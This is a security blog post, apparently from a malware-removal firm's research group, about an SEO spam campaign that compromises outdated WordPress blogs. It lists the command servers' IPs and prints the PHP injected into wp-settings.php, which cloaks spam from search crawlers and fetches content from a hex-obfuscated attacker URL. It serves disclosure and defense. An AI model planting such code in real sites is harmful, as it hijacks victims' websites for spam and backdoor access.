Blackhat SEO Spam C&C: wseow and seotoos up to no good!

We have been tracking these Blackhat SEO Spam C&C (command and control) servers for a while and thought it would be a good time to expose some of the details.

They have been actively trying to exploit blogs using old versions of WordPress to use them as part of their spam network.

IP addresses used:
94.75.221.117
94.75.221.118

Malware being used:
On the sites we’ve analyzed so far, wp-settings.php and index.php are hacked to load the SPAM, and to serve as a backdoor to the attackers.

This is the code added to the bottom of wp-settings.php:

http://sucuri.net/?page=tools&title=blacklist&detail=fe7b3ef5bba0429150672dfea5a66109

$server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
$stop_agents_masks = array("Teoma", "alexa", "froogle", "inktomi", 
"looksmart", "URL_Spider_SQL", "Firefly", "NationalDirectory", 
"Ask Jeeves", "TECNOSEEK", "InfoSeek", "WebFindBot", "girafabot", 
"crawler", "www.galaxy.com", "Googlebot", "Msnbot", "Scooter", 
"Slurp", "appie", "FAST", "WebBug", "Spade", "ZyBorg", "rabaz", "
Bing", "YoudaoBot", "Baiduspider", "Yeti");
foreach($stop_agents_masks as $stop_agents_mask) if(eregi(
$stop_agents_mask, $server_user_agent) !== false)
{$is_human = false; break;}if(!$is_human){
if(function_exists('wp_cache_clean_cache')&&isset($file_prefix)) 
wp_cache_clean_cache($file_prefix);$x0b=@wp_remote_fopen
("\x68\x74\x74\160\x3a\x2f\57\x77\163\x65\157\167\x2e
\143\x6f\155\x2f\156\x2f\120\x68\141\62\x31\x59\150\153
\147\x4b\x49\153\x6a\131\x65\163\57\163\x65\x72\x69\x61
\154\x69\x7a\145\x64");}

You can see the wp_remote_fopen doing a call to http://wseow dot com/n/Pha21YhkgKIkjYes/serialized

Affected sites:

There seems to be a lot of sites affected according to Google. Their main spam is about: “We Are The CHEAPEST Online – Drugstore”, so if you search for that you will find thousands of entries:

Most of the sites we’ve checked with ourscannerhave been out of date using very old versions of WordPress (from 2.1 to 2.7).

So for any WordPress user out there, make sure to update your blogs.

For hosting providers, we recommend that you block those IP addresses to protect your customers. In fact, we recommend blocking all those IP addresses (small list right now, but we will be updating it constantly moving forward).

We will post more details as we learn more about this attack.

If your site has been hacked and you need help, visit http://sucuri.net to learn about our malware removal and monitoring plans.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.